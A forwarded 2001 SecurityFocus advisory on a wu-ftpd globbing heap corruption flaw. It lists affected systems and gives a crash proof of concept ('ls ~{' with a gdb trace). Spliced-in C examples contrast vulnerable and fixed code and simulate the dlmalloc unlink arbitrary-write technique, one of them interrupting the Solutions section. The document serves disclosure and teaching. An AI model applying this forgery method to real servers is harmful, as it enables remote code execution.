heh, fun.

--
Nate Carlson <natecars at real-time.com>   | Phone : (952)943-8700
http://www.real-time.com                   | Fax   : (952)943-8500

---------- Forwarded message ----------
Date: Wed, 28 Nov 2001 10:05:28 -0700 (MST)
From: Dave Ahmad <da at securityfocus.com>
To: "bugtraq at securityfocus.com" <bugtraq at securityfocus.com>
Subject: *ALERT* BID 3581: Wu-Ftpd File Globbing Heap Corruption Vulnerability

---------------------------------------------------------------------------
Security Alert

Subject:        Wu-Ftpd File Globbing Heap Corruption Vulnerability
BUGTRAQ ID:     3581
CVE ID:         CVE-MAP-NOMATCH
Published:      Nov 27, 2001
Updated:        Nov 28, 2001 01:12:56
Remote:         Yes
Local:          No
Availability:   Always
Authentication: Not Required
Credibility:    Vendor Confirmed
Ease:           No Exploit Available
Class:          Failure to Handle Exceptional Conditions
Impact:         10.0
Severity:       10.0
Urgency:        8.2
Last Change:    Initial analysis.
---------------------------------------------------------------------------

Vulnerable Systems:

Washington University wu-ftpd 2.6.1
  + Caldera OpenLinux Server 3.1
  + Caldera OpenLinux Workstation 3.1
  + Cobalt Qube 1.0
  + Conectiva Linux 7.0
  + Conectiva Linux 6.0
  + MandrakeSoft Corporate Server 1.0.1
  + MandrakeSoft Linux Mandrake 8.1
  + MandrakeSoft Linux Mandrake 8.0 ppc
  + MandrakeSoft Linux Mandrake 8.0
  + MandrakeSoft Linux Mandrake 7.2
  + MandrakeSoft Linux Mandrake 7.1
  + MandrakeSoft Linux Mandrake 7.0
  + MandrakeSoft Linux Mandrake 6.1
  + MandrakeSoft Linux Mandrake 6.0
  + RedHat Linux 7.2 noarch
  + RedHat Linux 7.2 ia64
  + RedHat Linux 7.2 i686
  + RedHat Linux 7.2 i586
  + RedHat Linux 7.2 i386
  + RedHat Linux 7.2 athlon
  + RedHat Linux 7.2 alpha
  + RedHat Linux 7.1 noarch
  + RedHat Linux 7.1 ia64
  + RedHat Linux 7.1 i686
  + RedHat Linux 7.1 i586
  + RedHat Linux 7.1 i386
  + RedHat Linux 7.1 alpha
  + RedHat Linux 7.0 sparc
  + RedHat Linux 7.0 i386
  + RedHat Linux 7.0 alpha
  + TurboLinux TL Workstation 6.1
  + TurboLinux Turbo Linux 6.0.5
  + TurboLinux Turbo Linux 6.0.4
  + TurboLinux Turbo Linux 6.0.3
  + TurboLinux Turbo Linux 6.0.2
  + TurboLinux Turbo Linux 6.0.1
  + TurboLinux Turbo Linux 6.0
  + Wirex Immunix OS 7.0-Beta
  + Wirex Immunix OS 7.0
Washington University wu-ftpd 2.6.0
  + Cobalt Qube 1.0
  + Conectiva Linux 5.1
  + Conectiva Linux 5.0
  + Conectiva Linux 4.2
  + Conectiva Linux 4.1
  + Conectiva Linux 4.0es
  + Conectiva Linux 4.0
  + Debian Linux 2.2 sparc
  + Debian Linux 2.2 powerpc
  + Debian Linux 2.2 arm
  + Debian Linux 2.2 alpha
  + Debian Linux 2.2 68k
  + Debian Linux 2.2
  + RedHat Linux 6.2 sparc
  + RedHat Linux 6.2 i386
  + RedHat Linux 6.2 alpha
  + RedHat Linux 6.1 sparc
  + RedHat Linux 6.1 i386
  + RedHat Linux 6.1 alpha
  + RedHat Linux 6.0 sparc
  + RedHat Linux 6.0 i386
  + RedHat Linux 6.0 alpha
  + RedHat Linux 5.2 sparc
  + RedHat Linux 5.2 i386
  + RedHat Linux 5.2 alpha
  + S.u.S.E. Linux 6.4ppc
  + S.u.S.E. Linux 6.4alpha
  + S.u.S.E. Linux 6.4
  + S.u.S.E. Linux 6.3 ppc
  + S.u.S.E. Linux 6.3 alpha
  + S.u.S.E. Linux 6.3
  + S.u.S.E. Linux 6.2
  + S.u.S.E. Linux 6.1 alpha
  + S.u.S.E. Linux 6.1
  + TurboLinux Turbo Linux 4.0
  + Wirex Immunix OS 6.2
Washington University wu-ftpd 2.5.0
  + Caldera eDesktop 2.4
  + Caldera eServer 2.3.1
  + Caldera eServer 2.3
  + Caldera OpenLinux 2.4
  + Caldera OpenLinux Desktop 2.3
  + RedHat Linux 6.0 sparc
  + RedHat Linux 6.0 i386
  + RedHat Linux 6.0 alpha

Summary:
Wu-Ftpd contains a remotely exploitable heap corruption bug.

Impact:
A remote attacker may execute arbitrary code on the vulnerable server.

Technical Description:
Wu-Ftpd is an ftp server based on the BSD ftpd that is maintained by Washington University. Wu-Ftpd allows clients to select files for ftp actions using "file globbing" patterns of the kind also used by various shells. The implementation of file globbing included in Wu-Ftpd contains a heap corruption vulnerability that may allow an attacker to execute arbitrary code on the server remotely.

During the processing of a globbing pattern, the Wu-Ftpd implementation creates a list of the files that match.
The memory where this list is stored is on the heap, allocated using malloc(). The globbing function simply returns a pointer to the list; it is up to the calling functions to free the allocated memory. If an error occurs while processing the pattern, no memory is allocated and a variable indicating the error should be set. The calling functions must check the value of this variable before attempting to use the globbed filenames (and before later freeing the memory).

When certain globbing patterns are processed, the globbing function does not set this variable even though an error has occurred. As a result, Wu-Ftpd may eventually call free() on a pointer that was never initialized, i.e. on whatever value happened to be left in that memory. There are a number of possibly exploitable conditions. If the memory the stale pointer refers to contained user-controllable data before the free() call, it may be possible, by way of a forged malloc header, to have an arbitrary word in memory overwritten with an arbitrary value. This can lead to execution of arbitrary code if function pointers or return addresses are overwritten.

If anonymous FTP is not enabled, valid user credentials are required to exploit this vulnerability.

This vulnerability was initially scheduled for public release on December 3, 2001. However, Red Hat made details public as of November 27, 2001. As a result, we are forced to warn other users of the vulnerable product, so that they may take appropriate actions.

Attack Scenarios:
To exploit this vulnerability, an attacker must either have valid credentials to log in as an FTP user, or anonymous access must be enabled.

The attacker must ensure that a maliciously constructed malloc header containing the target address and its replacement value is in the right location in the uninitialized part of the heap. The attacker must also place shellcode in server process memory.

The attacker must then send an FTP command containing a specific globbing pattern that does not set the error variable.
When the server attempts to free the memory it believes holds the globbed filenames, the target word in memory will be overwritten. If the attacker overwrites a function pointer or return address with a pointer to the shellcode, the shellcode may be executed by the server process.

Exploits:
The following (from the CORE advisory) demonstrates the existence of this vulnerability:

ftp> open localhost
Connected to localhost (127.0.0.1).
220 sasha FTP server (Version wu-2.6.1-18) ready.
Name (localhost:root): anonymous
331 Guest login ok, send your complete e-mail address as password.
Password:
230 Guest login ok, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls ~{
227 Entering Passive Mode (127,0,0,1,241,205)
421 Service not available, remote server has closed connection

 1405 ?        S      0:00 ftpd: accepting connections on port 21
 7611 tty3     S      1:29 gdb /usr/sbin/wu.ftpd
26256 ?        S      0:00 ftpd: sasha:anonymous/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
26265 tty3     R      0:00 bash -c ps ax | grep ftpd

(gdb) at 26256
Attaching to program: /usr/sbin/wu.ftpd, process 26256
Symbols already loaded for /lib/libcrypt.so.1
Symbols already loaded for /lib/libnsl.so.1
Symbols already loaded for /lib/libresolv.so.2
Symbols already loaded for /lib/libpam.so.0
Symbols already loaded for /lib/libdl.so.2
Symbols already loaded for /lib/i686/libc.so.6
Symbols already loaded for /lib/ld-linux.so.2
Symbols already loaded for /lib/libnss_files.so.2
Symbols already loaded for /lib/libnss_nisplus.so.2
Symbols already loaded for /lib/libnss_nis.so.2
0x40165544 in __libc_read () from /lib/i686/libc.so.6
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
__libc_free (mem=0x61616161) at malloc.c:3136
3136    in malloc.c

Note that the pointer handed to free(), 0x61616161, is the byte sequence "aaaa": the anonymous password supplied at login (visible in the ps output above) is what was left in the uninitialized pointer's storage.

Currently the SecurityFocus staff are not aware of any exploits for this issue.
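The control-flow defect behind that trace, as an added illustration in C (this is not wu-ftpd's glob.c and not code from the advisory): a toy glob routine whose error path leaves both the error flag and the result pointer untouched, beside a hardened version that sets both on every exit. The "~{" check, the glob_state structure and the STALE_USER_DATA sentinel are assumptions made for the example; the stale value 0x61616161 is chosen to match the free() argument in the gdb output.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Added example, not wu-ftpd source. Models the control-flow defect the
 * advisory describes: a glob routine that, for some patterns, returns
 * without setting the error flag or its result pointer, so the caller
 * goes on to free() whatever stale value sat in that slot. The stale
 * memory is simulated explicitly and the bad pointer is only reported,
 * never handed to free(), so the program stays well-defined. */

typedef struct {
    char **list;    /* result pointer; its storage may hold stale bytes */
    int    globerr; /* error indicator the caller is expected to check */
} glob_state;

/* Constructed stale value: the bytes "aaaa" left behind by an earlier
 * user-supplied string, matching free(mem=0x61616161) in the gdb trace. */
#define STALE_USER_DATA ((char **)(uintptr_t)0x61616161u)

static void seed_stale_memory(glob_state *st)
{
    st->list = STALE_USER_DATA;
    st->globerr = 0;
}

/* One-entry, NULL-terminated match list for an ordinary pattern. */
static char **make_list(const char *pattern)
{
    char **v = calloc(2, sizeof *v);
    if (!v)
        return NULL;
    v[0] = malloc(strlen(pattern) + 1);
    if (v[0])
        strcpy(v[0], pattern);
    return v;
}

static void free_list(char **v)
{
    if (!v)
        return;
    for (char **p = v; *p; p++)
        free(*p);
    free(v);
}

/* Vulnerable variant: the unsupported "~{" pattern (a hypothetical check
 * standing in for the real parser) takes an early return that sets
 * neither globerr nor the result pointer. */
static void glob_vulnerable(glob_state *st, const char *pattern)
{
    if (strncmp(pattern, "~{", 2) == 0)
        return;                 /* BUG: error path leaves state untouched */
    st->globerr = 0;
    st->list = make_list(pattern);
}

/* Hardened variant: every exit path sets both fields. */
static void glob_fixed(glob_state *st, const char *pattern)
{
    st->list = NULL;            /* never leave the pointer indeterminate */
    if (strncmp(pattern, "~{", 2) == 0) {
        st->globerr = 1;        /* report the failure to the caller */
        return;
    }
    st->globerr = 0;
    st->list = make_list(pattern);
}

/* Mimics the calling code: check globerr, use the list, free it. Returns
 * the pointer that would have reached free() when it is not one the
 * allocator handed out (the exploitable case), otherwise NULL. */
static char **caller(void (*glob)(glob_state *, const char *),
                     const char *pattern)
{
    glob_state st;
    seed_stale_memory(&st);
    glob(&st, pattern);
    if (st.globerr)
        return NULL;            /* error reported: nothing to free */
    if (st.list == STALE_USER_DATA)
        return st.list;         /* would be free(0x61616161): crash or heap write */
    free_list(st.list);
    return NULL;
}

int main(void)
{
    printf("vulnerable, ls ~{ : free(%p)\n", (void *)caller(glob_vulnerable, "~{"));
    printf("fixed,      ls ~{ : free(%p)\n", (void *)caller(glob_fixed, "~{"));
    return 0;
}
```

With glob_vulnerable() the caller reaches free() with a pointer the allocator never handed out, exactly the state the SIGSEGV above shows; with glob_fixed() the caller's globerr check is sufficient. The fix pattern is the same in any C code that returns heap results alongside an error flag: initialise the out-pointer to NULL before any early return, and set the flag on every failing path.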
If you feel we are in error or are aware of more recent information, please mail us at: vuldb at securityfocus.com <mailto:vuldb at securityfocus.com>

Mitigating Strategies:
This vulnerability is remotely exploitable. Restricting access to the network port (TCP port 21 is standard for FTP) will block clients from unauthorized networks.

With some operating systems, anonymous FTP is enabled by default. Anonymous FTP is often in use on public FTP sites, most often software repositories. It is basically a guest account with access to download files from within a restricted environment. This vulnerability is exploitable by clients logged in through anonymous FTP. Anonymous FTP should be disabled immediately until fixes are available, as it allows any host on the Internet that can connect to the service to exploit this vulnerability. It is a good idea to disable it normally unless it is absolutely necessary (in which case the FTP server should be on a dedicated, isolated host).

Stack and other memory protection schemes may complicate exploitation and/or prevent commonly available exploits from working. This should not be relied upon for security. This vulnerability involves 'poking' words in memory, so there are many different ways it may be exploited. Making the stack non-executable or checking the integrity of stack variables may not be enough to prevent all possible methods of exploitation. It is advised to disable the service and use alternatives until fixes are available.

Solutions:
Vendor notified on Nov 14, 2001.

Fixes will be available from the author as well as from vendors who ship products that include Wu-Ftpd as core or optional components.

This vulnerability was initially scheduled for public release on December 3, 2001. Red Hat pre-emptively released an advisory on November 27, 2001. As a result, other vendors may not yet have fixes available. This record will be updated as fixes from various vendors become available.
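How the "malloc header containing the target address and its replacement value" from the attack scenario becomes the arbitrary word 'poke' that the mitigation text warns about, as an added example in C (not from the advisory, CORE or glibc): the free()-time unlink step of the dlmalloc-derived allocator in the glibc of that period, replayed on a toy word-addressed memory. The addresses CHUNK, PAYLOAD and TARGET are constructed for the example; the chunk layout (prev_size, size, fd, bk) and the two unlink writes are the classic pre-safe-unlinking ones.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Added example, not from the advisory, CORE or glibc. Replays the
 * free()-time unlink step of the dlmalloc-derived allocator in the glibc
 * of the period on a toy 32-bit, word-addressed memory, to show how a
 * forged "malloc header containing the target address and its
 * replacement value" becomes an arbitrary word write. No real allocator
 * is touched; every address below is an index into mem[]. */

#define MEM_WORDS 64
static uint32_t mem[MEM_WORDS];   /* toy address space, one 32-bit word per cell */

/* A free chunk header is four words: prev_size, size, fd, bk. On i386 the
 * fd and bk fields sit at byte offsets 8 and 12. */
enum { PREV_SIZE = 0, SIZE = 1, FD = 2, BK = 3 };

/* Classic (pre safe-unlinking) unlink(P, BK, FD):
 *     BK = P->bk; FD = P->fd; FD->bk = BK; BK->fd = FD;
 * With fd and bk under attacker control these are two writes to
 * attacker-chosen addresses. */
static void dl_unlink(uint32_t p)
{
    uint32_t fd = mem[p + FD];
    uint32_t bk = mem[p + BK];
    mem[fd + BK] = bk;   /* write #1: *(fd + 12) = bk, the intended overwrite */
    mem[bk + FD] = fd;   /* write #2: *(bk + 8) = fd, collateral write into the payload */
}

/* Constructed layout (word addresses chosen for the example):
 *   CHUNK    the forged free chunk the server is tricked into freeing
 *   TARGET   a word later used as a code pointer (function pointer,
 *            saved return address, GOT entry)
 *   PAYLOAD  where the attacker's code sits; the value written to TARGET */
enum { CHUNK = 8, PAYLOAD = 20, TARGET = 40 };

/* Forge the chunk so that write #1 lands on TARGET: fd = TARGET minus the
 * offset of bk (the classic "target - 12" on i386; here minus 3 words),
 * bk = the replacement value. Returns the word now found at TARGET. */
static uint32_t forge_and_free(void)
{
    memset(mem, 0, sizeof mem);
    mem[TARGET] = 0xdeadbeefu;       /* original code pointer, to be replaced */
    mem[CHUNK + FD] = TARGET - BK;   /* so that &mem[fd + BK] == &mem[TARGET] */
    mem[CHUNK + BK] = PAYLOAD;       /* the replacement value */
    dl_unlink(CHUNK);                /* what free() does when it consolidates */
    return mem[TARGET];
}

/* Write #2 clobbers word PAYLOAD + 2 with fd, which is why payloads of
 * the period began with a short jump over their first bytes. */
static uint32_t collateral_word(void)
{
    return mem[PAYLOAD + FD];
}

int main(void)
{
    printf("mem[TARGET]      = %u (PAYLOAD is %u)\n", forge_and_free(), (unsigned)PAYLOAD);
    printf("mem[PAYLOAD + 2] = %u (fd was %u)\n", collateral_word(), (unsigned)(TARGET - BK));
    return 0;
}
```

Write #1 is the overwrite the attack scenario describes; write #2 is the reason the shellcode must tolerate having bytes 8 through 11 clobbered. Later glibc releases added the "corrupted double-linked list" check (FD->bk == P and BK->fd == P) that rejects this exact forgery, which is the kind of allocator hardening the mitigation text says may break common exploits but should not be relied upon on its own.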
For Washington University wu-ftpd 2.6.1:

Red Hat RPM 6.2 alpha wu-ftpd-2.6.1-0.6x.21.alpha.rpm
  ftp://updates.redhat.com/6.2/en/os/alpha/wu-ftpd-2.6.1-0.6x.21.alpha.rpm
Red Hat RPM 6.2 sparc wu-ftpd-2.6.1-0.6x.21.sparc.rpm
  ftp://updates.redhat.com/6.2/en/os/sparc/wu-ftpd-2.6.1-0.6x.21.sparc.rpm
Red Hat RPM 7.0 alpha wu-ftpd-2.6.1-16.7x.1.alpha.rpm
  ftp://updates.redhat.com/7.0/en/os/alpha/wu-ftpd-2.6.1-16.7x.1.alpha.rpm
Red Hat RPM 7.0 i386 wu-ftpd-2.6.1-16.7x.1.i386.rpm
  ftp://updates.redhat.com/7.0/en/os/i386/wu-ftpd-2.6.1-16.7x.1.i386.rpm
Red Hat RPM 7.1 alpha wu-ftpd-2.6.1-16.7x.1.alpha.rpm
  ftp://updates.redhat.com/7.1/en/os/alpha/wu-ftpd-2.6.1-16.7x.1.alpha.rpm
Red Hat RPM 7.1 i386 wu-ftpd-2.6.1-16.7x.1.i386.rpm
  ftp://updates.redhat.com/7.1/en/os/i386/wu-ftpd-2.6.1-16.7x.1.i386.rpm
Red Hat RPM 7.1 ia64 wu-ftpd-2.6.1-16.7x.1.ia64.rpm
  ftp://updates.redhat.com/7.1/en/os/ia64/wu-ftpd-2.6.1-16.7x.1.ia64.rpm
Red Hat RPM 7.2 i386 wu-ftpd-2.6.1-20.i386.rpm
  ftp://updates.redhat.com/7.2/en/os/i386/wu-ftpd-2.6.1-20.i386.rpm
Red Hat RPM 6.2 i386 wu-ftpd-2.6.1-0.6x.21.i386.rpm
  ftp://updates.redhat.com/6.2/en/os/i386/wu-ftpd-2.6.1-0.6x.21.i386.rpm

Credit:
Condition first reported by Matt Power, deemed non-exploitable. Rediscovered and exploitability later confirmed by Luciano Notarfrancesco and Juan Pablo Martinez Kuhn from Core Security Technologies, Buenos Aires, Argentina.

References:
advisory: RedHat RHSA-2001:157-06: Updated wu-ftpd packages are available
  http://www.securityfocus.com/advisories/3680
web page: CORE SDI Homepage (CORE)
  http://www.core-sdi.com
web page: Wu-Ftpd Homepage (Washington University)
  http://www.wu-ftpd.org

ChangeLog:
Nov 26, 2001: Initial analysis.

---------------------------------------------------------------------------
HOW TO INTERPRET THIS ALERT

BUGTRAQ ID: This is a unique identifier assigned to the vulnerability by SecurityFocus.com.
CVE ID: This is a unique identifier assigned to the vulnerability by the CVE.
Published: The date the vulnerability was first made public.
Updated: The date the information was last updated.
Remote: Whether this is a remotely exploitable vulnerability.
Local: Whether this is a locally exploitable vulnerability.
Credibility: Describes how credible the information about the vulnerability is. Possible values are:
  Conflicting Reports: There are multiple conflicting reports about the existence of the vulnerability.
  Single Source: There is a single non-reliable source reporting the existence of the vulnerability.
  Reliable Source: There is a single reliable source reporting the existence of the vulnerability.
  Conflicting Details: There is consensus on the existence of the vulnerability but not on its details.
  Multiple Sources: There is consensus on the existence and details of the vulnerability.
  Vendor Confirmed: The vendor has confirmed the vulnerability.
Class: The class of vulnerability. Possible values are: Boundary Condition Error, Access Validation Error, Origin Validation Error, Input Validation Error, Failure to Handle Exceptional Conditions, Race Condition Error, Serialization Error, Atomicity Error, Environment Error, and Configuration Error.
Ease: Rates how easily the vulnerability can be exploited. Possible values are: No Exploit Available, Exploit Available, and No Exploit Required.
Impact: Rates the impact of the vulnerability. Its range is 1 through 10.
Severity: Rates the severity of the vulnerability. Its range is 1 through 10. It is computed from the impact rating and the remote flag. Remote vulnerabilities with a high impact rating receive a high severity rating. Local vulnerabilities with a low impact rating receive a low severity rating.
Urgency: Rates how quickly you should take action to fix or mitigate the vulnerability. Its range is 1 through 10. It is computed from the severity rating, the ease rating, and the credibility rating.
High severity vulnerabilities with a high ease rating and a high credibility rating have a higher urgency rating. Low severity vulnerabilities with a low ease rating and a low credibility rating have a lower urgency rating.
Last Change: The last change made to the vulnerability information.
Vulnerable Systems: The list of vulnerable systems. A '+' preceding a system name indicates that one of that system's components is vulnerable. For example, Windows 98 ships with Internet Explorer, so if a vulnerability is found in IE you may see something like:
  Microsoft Internet Explorer
    + Microsoft Windows 98
Non-Vulnerable Systems: The list of non-vulnerable systems.
Summary: A concise summary of the vulnerability.
Impact: The impact of the vulnerability.
Technical Description: The in-depth description of the vulnerability.
Attack Scenarios: Ways an attacker may make use of the vulnerability.
Exploits: Exploit instructions or programs.
Mitigating Strategies: Ways to mitigate the vulnerability.
Solutions: Solutions to the vulnerability.
Credit: Information about who disclosed the vulnerability.
References: Sources of information on the vulnerability.
Related Resources: Resources that might be of additional value.
ChangeLog: History of changes to the vulnerability record.
---------------------------------------------------------------------------
Copyright 2001 SecurityFocus.com

----------
SecurityFocus - the leading provider of Security Intelligence Services for business.
Visit our website at www.securityfocus.com